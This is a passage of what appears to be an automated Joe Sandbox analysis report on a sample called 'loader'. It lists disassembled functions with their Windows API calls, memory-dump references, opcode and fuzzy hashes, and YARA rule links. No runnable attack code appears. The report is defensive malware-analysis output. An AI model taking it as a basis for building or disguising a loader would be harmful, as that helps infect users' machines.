              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: FileWrite$Handle
              • String ID:
              • API String ID: 4209713984-0
              • Opcode ID: d95d1fed820f9a2d820dccd0a302983616aad04132025102459f4c58f02afabd
              • Instruction ID: e4236aac0db78a3059f5f62896d2bf2cf89794b7f170507ad40415ecca217a56
              • Opcode Fuzzy Hash: d95d1fed820f9a2d820dccd0a302983616aad04132025102459f4c58f02afabd
              • Instruction Fuzzy Hash: ED3104712083069BDF148F14D95876BBFA8EF50710F044618F9D5EA1D2C7F5D848CBA2
              Function 0010A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
              Download Yara Rule
              APIs
              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0010A113,?,00000001,00000000,?,?), ref: 0010A22E
              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0010A113,?,00000001,00000000,?,?), ref: 0010A261
              • GetLastError.KERNEL32(?,?,?,?,0010A113,?,00000001,00000000,?,?), ref: 0010A27E
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CreateDirectory$ErrorLast
              • String ID:
              • API String ID: 2485089472-0
              • Opcode ID: 80441795661628d3d76a7b5e401a1b59b4829f7d9512ef50741ae55cf0fe22b6
              • Instruction ID: c5b9783571c362672fbe27819e4f77ff0987b9be77f8a62598f541c4fa7737c4
              • Opcode Fuzzy Hash: 80441795661628d3d76a7b5e401a1b59b4829f7d9512ef50741ae55cf0fe22b6
              • Instruction Fuzzy Hash: 5D01B13154031866DB36ABB44C46BEE7758BF1A781F844471F8C1D60D1DBE6CA81C6B7
              Function 0012329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
              Download Yara Rule
              APIs
              • try_get_function.LIBVCRUNTIME ref: 001232AF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: try_get_function
              • String ID: FlsAlloc
              • API String ID: 2742660187-671089009
              • Opcode ID: defcaa76313b27838447223637942bd895174e057073fb298f6957ddab61e320
              • Instruction ID: 75ecb4e45ddadaaa87a4385a38301e31ae1350a6be6d6ee1fafa42c4a9e2f3f3
              • Opcode Fuzzy Hash: defcaa76313b27838447223637942bd895174e057073fb298f6957ddab61e320
              • Instruction Fuzzy Hash: CDD02BE17806346BC21032C07C03AAE7E858701FB1F450162FE081A1428765456002C9
              Function 0011E1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011E20B
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID: 3Ro
              • API String ID: 1269201914-1492261280
              • Opcode ID: 2334ca094554957c8b5e237d02f8e3654ad05fd74bdfb2d5e6ebe12fe7ec2013
              • Instruction ID: 68850adf19af924451f7b666e80065d7ad2847e2d190ecc6de6e7b1cca6ded83
              • Opcode Fuzzy Hash: 2334ca094554957c8b5e237d02f8e3654ad05fd74bdfb2d5e6ebe12fe7ec2013
              • Instruction Fuzzy Hash: E6B012A226E0037CB20C11447E16CB7031CC4C0B50330803AF605E4080E7514D874032
              Function 00101385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00101385
                • Part of subcall function 00106057: __EH_prolog.LIBCMT ref: 0010605C
                • Part of subcall function 0010C827: __EH_prolog.LIBCMT ref: 0010C82C
                • Part of subcall function 0010C827: new.LIBCMT ref: 0010C86F
                • Part of subcall function 0010C827: new.LIBCMT ref: 0010C893
              • new.LIBCMT ref: 001013FE
                • Part of subcall function 0010B07D: __EH_prolog.LIBCMT ref: 0010B082
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: aecaf0e462d589a5318f3c520cef2b90e2c71e4fc30c63dc0051f1bf17b69f95
              • Instruction ID: 207aa58d2485b2d1901c41d098bea1bf549aaa42682c55fb50aac2ecff964d1e
              • Opcode Fuzzy Hash: aecaf0e462d589a5318f3c520cef2b90e2c71e4fc30c63dc0051f1bf17b69f95
              • Instruction Fuzzy Hash: 214127B0905B409ED724DF7984859E7FBE5FF28300F504A2ED5EE83282DB726554CB15
              Function 00101380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00101385
                • Part of subcall function 00106057: __EH_prolog.LIBCMT ref: 0010605C
                • Part of subcall function 0010C827: __EH_prolog.LIBCMT ref: 0010C82C
                • Part of subcall function 0010C827: new.LIBCMT ref: 0010C86F
                • Part of subcall function 0010C827: new.LIBCMT ref: 0010C893
              • new.LIBCMT ref: 001013FE
                • Part of subcall function 0010B07D: __EH_prolog.LIBCMT ref: 0010B082
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 1b943ab2de38a914703a982649e91a50217458656b479a36504422a26e8ef88a
              • Instruction ID: 295976396f0be93d1aa82a57ea8d8fc6b06d1f83a5a06ae885cd0ba9b6c1b915
              • Opcode Fuzzy Hash: 1b943ab2de38a914703a982649e91a50217458656b479a36504422a26e8ef88a
              • Instruction Fuzzy Hash: 604134B0905B409EE724DF7988859E7FBE5FF28300F504A2EE5EE83282DB726554CB15
              Function 0012B188 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00128FA5: GetLastError.KERNEL32(?,00140EE8,00123E14,00140EE8,?,?,00123713,00000050,?,00140EE8,00000200), ref: 00128FA9
                • Part of subcall function 00128FA5: _free.LIBCMT ref: 00128FDC
                • Part of subcall function 00128FA5: SetLastError.KERNEL32(00000000,?,00140EE8,00000200), ref: 0012901D
                • Part of subcall function 00128FA5: _abort.LIBCMT ref: 00129023
                • Part of subcall function 0012B2AE: _abort.LIBCMT ref: 0012B2E0
                • Part of subcall function 0012B2AE: _free.LIBCMT ref: 0012B314
                • Part of subcall function 0012AF1B: GetOEMCP.KERNEL32(00000000,?,?,0012B1A5,?), ref: 0012AF46
              • _free.LIBCMT ref: 0012B200
              • _free.LIBCMT ref: 0012B236
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: _free$ErrorLast_abort
              • String ID:
              • API String ID: 2991157371-0
              • Opcode ID: dc732ab99ee6779179c828bb7afce7bd1332f6f81efc16b180a08138f9653a4e
              • Instruction ID: 31ede24e13ff62b198f6fa2950f37ea8decad1de21f355f62c594be1b488a3ab
              • Opcode Fuzzy Hash: dc732ab99ee6779179c828bb7afce7bd1332f6f81efc16b180a08138f9653a4e
              • Instruction Fuzzy Hash: AF31EA31908324EFDB10EF99F481B5DB7F5EF55320F254099E4149B291EB715D61CB50
              Function 0010971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00109EDC,?,?,00107867), ref: 001097A6
              • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00109EDC,?,?,00107867), ref: 001097DB
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 5673483c5de6a24c76bdd17fd5401a3412d75b2ed9351751d0138ac68f198e8f
              • Instruction ID: 1529a5f3d04c0efe9ec4092a51b399f05accf88613d46b476433ede922fd4e1c
              • Opcode Fuzzy Hash: 5673483c5de6a24c76bdd17fd5401a3412d75b2ed9351751d0138ac68f198e8f
              • Instruction Fuzzy Hash: CA2105B2114748AFE7348F64CC85BA7B7E8EB49764F00492DF5E5821D2C7B4AC898F61
              Function 00109D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
              Download Yara Rule
              APIs
              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00107547,?,?,?,?), ref: 00109D7C
              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00109E2C
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: File$BuffersFlushTime
              • String ID:
              • API String ID: 1392018926-0
              • Opcode ID: 1cd59bc52634bc052e4f1e70635c6d3e978d5e863b3b795e37a74d4c6924cd17
              • Instruction ID: dda31438881a75ec037dae13b6eb44cac034a6e2489dbf124a7d96725e7cf26e
              • Opcode Fuzzy Hash: 1cd59bc52634bc052e4f1e70635c6d3e978d5e863b3b795e37a74d4c6924cd17
              • Instruction Fuzzy Hash: BC21E731188246ABC715DF64C461EABBBE4AF95708F04081DF4D1C7582D369DE4CDB51
              Function 00109B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
              Download Yara Rule
              APIs
              • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00109B35,?,?,00000000,?,?,00108D9C,?), ref: 00109BC0
              • GetLastError.KERNEL32 ref: 00109BCD
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorFileLastPointer
              • String ID:
              • API String ID: 2976181284-0
              • Opcode ID: 62823fbd27fe1508b22ae3ef8a2507fb1002e5730efc7b693db196214d7a0e03
              • Instruction ID: a58b20677e319f8528ef648d810f33e2c8aeb3438941fafcabcbc260a8cd3ac6
              • Opcode Fuzzy Hash: 62823fbd27fe1508b22ae3ef8a2507fb1002e5730efc7b693db196214d7a0e03
              • Instruction Fuzzy Hash: 7A0104313052059BCB08DE25ACA4C7EB399AFC0332B14852DF8A2836C2DBB4D8059A21
              Function 00109E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
              Download Yara Rule
              APIs
              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00109E76
              • GetLastError.KERNEL32 ref: 00109E82
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorFileLastPointer
              • String ID:
              • API String ID: 2976181284-0
              • Opcode ID: 4bbdb63fc83997f27721d869f6109e5952f0db42d7561abc46a934fd582d9512
              • Instruction ID: bddcf41082ef4608ed9d6e97238fad9099b88ddf6abddbc753eee3f86b7568c0
              • Opcode Fuzzy Hash: 4bbdb63fc83997f27721d869f6109e5952f0db42d7561abc46a934fd582d9512
              • Instruction Fuzzy Hash: 800171717042005BEB34DE29DC54B6BB7D99B88315F14493EB196C36D1DBB5EC888610
              Function 00128606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 00128627
                • Part of subcall function 00128518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0012C13D,00000000,?,001267E2,?,00000008,?,001289AD,?,?,?), ref: 0012854A
              • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00140F50,0010CE57,?,?,?,?,?,?), ref: 00128663
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Heap$AllocAllocate_free
              • String ID:
              • API String ID: 2447670028-0
              • Opcode ID: ff355e8ed995c0889cd83d9de29d7d565aaf4434123d93c38bcfb9c21b00cda2
              • Instruction ID: 485789feeb82eb88dd431e10a563d05d01bc15cb170b20c55eb7aa29b06b9c33
              • Opcode Fuzzy Hash: ff355e8ed995c0889cd83d9de29d7d565aaf4434123d93c38bcfb9c21b00cda2
              • Instruction Fuzzy Hash: EFF0F032203135AACB312B26BC00F6F3B69DFE2BB0F298115F824A6591DF30C87095A4
              Function 00110908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
              Download Yara Rule
              APIs
              • GetCurrentProcess.KERNEL32(?,?), ref: 00110915
              • GetProcessAffinityMask.KERNEL32(00000000), ref: 0011091C
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Process$AffinityCurrentMask
              • String ID:
              • API String ID: 1231390398-0
              • Opcode ID: 5ec0ee234daab7626197f7de197f272f3d19889ddfece86ead3ca8a8bbeba745
              • Instruction ID: 4522f8578a5d6f173555af2c8364a1007c14667d886f93a24bbb3be589db678c
              • Opcode Fuzzy Hash: 5ec0ee234daab7626197f7de197f272f3d19889ddfece86ead3ca8a8bbeba745
              • Instruction Fuzzy Hash: 1CE09232E1410DABAF0ECAB49C248FB739DEB0C2187214179B81ED7601FB70DEC186A4
              Function 0010A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
              Download Yara Rule
              APIs
              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0010A27A,?,?,?,0010A113,?,00000001,00000000,?,?), ref: 0010A458
              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0010A27A,?,?,?,0010A113,?,00000001,00000000,?,?), ref: 0010A489
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: 25e2a879ad9b1da0c0d51049122f32017e500281086a7448c35e6ddf73713119
              • Instruction ID: b0b186207ada9d0a3bea6b3e8f390b2964d4b19530a4ebc9dce8aba7864c8832
              • Opcode Fuzzy Hash: 25e2a879ad9b1da0c0d51049122f32017e500281086a7448c35e6ddf73713119
              • Instruction Fuzzy Hash: 49F0A03524020DBBEF015F60DC45FD9776CBF08382F488061BC88C61A1DBB28AE9AA50
              Function 0011D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ItemText_swprintf
              • String ID:
              • API String ID: 3011073432-0
              • Opcode ID: 8cbcc4be155427720f4a7d80aeaa779919563ec27a066b70a7ac9e84a9b87b9e
              • Instruction ID: 3d395d1fa505c17d121e6ed5838f92170cd4a9d7fccd815afcb08ac30242298d
              • Opcode Fuzzy Hash: 8cbcc4be155427720f4a7d80aeaa779919563ec27a066b70a7ac9e84a9b87b9e
              • Instruction Fuzzy Hash: F2F0EC715043487ADB15BBF09C07FDD3B6DAB15745F040565B700534F2DB716AD04761
              Function 0010A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
              Download Yara Rule
              APIs
              • DeleteFileW.KERNELBASE(?,?,?,0010984C,?,?,00109688,?,?,?,?,00131FA1,000000FF), ref: 0010A13E
              • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0010984C,?,?,00109688,?,?,?,?,00131FA1,000000FF), ref: 0010A16C
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: e8fe16c82748423df5d3fd2825608b36ff272ebc8f6c774c6bc8ca2c7077b85f
              • Instruction ID: 01769edb18f28b50218e878686bc2cf569825155227eb3dd5b92172727f26b84
              • Opcode Fuzzy Hash: e8fe16c82748423df5d3fd2825608b36ff272ebc8f6c774c6bc8ca2c7077b85f
              • Instruction Fuzzy Hash: ECE092356402086BDB119F60DC81FE977ACBF08382F884065BCC8C30A0DBB29ED4AA94
              Function 0011A39D Relevance: 3.0, APIs: 2, Instructions: 27COMMON
              Download Yara Rule
